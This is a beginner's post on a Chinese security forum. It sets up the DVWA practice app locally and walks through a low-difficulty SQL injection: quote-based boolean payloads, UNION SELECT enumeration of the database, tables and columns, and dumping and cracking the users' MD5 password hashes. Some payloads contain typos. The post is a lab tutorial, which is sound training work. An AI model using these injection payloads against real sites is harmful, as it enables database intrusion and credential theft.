搜索
查看: 3273|回复: 4

DVWA的搭建及sql注入攻击安全测试 新人帖

    [复制链接]

1

主题

7

帖子

15

积分

新手开车

Rank: 1

积分
15
发表于 2019-7-4 19:12:26 | 显示全部楼层 |阅读模式


DVWA是用php语言写的安全测试平台
如果你网安入门,并且找不到合适的靶机,推荐将DVWA作为你的渗透演练系统
Download
https://github.com/ethicalhack3r/DVWA        #Github下载地址

Install
1. 解压先cd进入目录
unzip XXX.zip

2. 将解压的文件夹移入目录
mv XXX dvwa   #将文件夹改名
mv dvwa /var/www/html
3. 修改文件夹权限:
chmod -R 755 dvwa   #-recursive (递归更改文件和目录)755:保留完全访问权限,阻止他人修改文件

4.  启动apache2 和mysql
service apache2 start  
service mysql start  

#如果有一行Error,把start改成restart. 每次开机想打开DVWA前先start一下

5. 进入mysql
mysql -u root -p

6. 输入以下建库以及初始化(分开来输)
create database dvwa;
create user 'dvwa'@'localhost' identified by 'dvwa';
grant all on *.* to 'dvwa'@'localhost';
set password for 'dvwa'@'localhost' = password('dvwa');
exit

8. 修改配置文件
cd /var/www/hrml/dvwa/config/
mv config.inc.php.dist config.inc.php
vi config.inc.php


9. 修改配置信息
$_DVWA[ 'db_user' ] = 'dvwa';
$_DVWA[ 'db_password' ] = 'dvwa';
$_DVWA[ 'db_database' ] = 'dvwa';


10. 浏览器输入127.0.0.1/dvwa或localhost/dvwa,按下方Create进入dvwa界面
初始账密:admin password
sql注入
1. 进入界面,在DVWA Sercurity选项中选Low(最低难度),然后记得Submit。选择SQL Injection

2. 输入1, 返回ID为1的用户名

3. 尝试and 1=1, 发现没变化。and 1=2, 也没变。下一步尝试字符注入。

尝试' 报错,再尝试‘or 1=1或者'or '1=1爆出所有ID和用户名。
确定为字符注入。
4. 判断数据库个数,尝试 'union select 1,2' ,爆出至少有数据库2个。

尝试'union select 1,2,3',报错,只有两个。

5. 'union select 2,database()',爆出数据库名dvwa

6. 爆表,‘union select 2, group_concat(table_name) from infromation_schema.tables where table_schema=database()#
可以看到只有两个表users,guestbook。

7.  爆字段,'union select 2,group_concat(column_name) from information_scheme,colums where table_name='users'#
第四个字段就是密码,马上大功告成了。

8. 查看字段,'union select group_concat(user_id,first_name),group_concat(password) from users#

第一个MD5码是密码,网页查询,得到密码password
结合步骤,用户是admin,ID为1

上传漏洞,注入完毕。
有一部电影《黑客军团》,主角就是用kali的,可以打发打发时间,个人认为情节什么的还行,偏黑暗风。
链接:
https://pan.baidu.com/s/1BYLfEhG4aFKQE-X5BpyMCg 提取码:u12z
我是一名新人小白,希望能和大佬多多交流。















来自群组: kali学习

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
我不怕黑暗,也不怕堕落。
回复

使用道具 举报

78

主题

111

帖子

199

积分

注册会员

Rank: 2

积分
199
发表于 2019-7-6 09:23:23 来自手机 | 显示全部楼层
此帖仅作者可见

使用道具 举报

273

主题

389

帖子

858

积分

vip用户

Rank: 6Rank: 6

积分
858

注册会员活跃会员热心会员

QQ
发表于 2019-7-6 09:26:05 来自手机 | 显示全部楼层
此帖仅作者可见

使用道具 举报

1

主题

7

帖子

15

积分

新手开车

Rank: 1

积分
15
 楼主| 发表于 2019-7-7 18:26:43 | 显示全部楼层
此帖仅作者可见
我不怕黑暗,也不怕堕落。

使用道具 举报

1

主题

7

帖子

15

积分

新手开车

Rank: 1

积分
15
 楼主| 发表于 2019-7-7 18:48:58 | 显示全部楼层
此帖仅作者可见
我不怕黑暗,也不怕堕落。

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表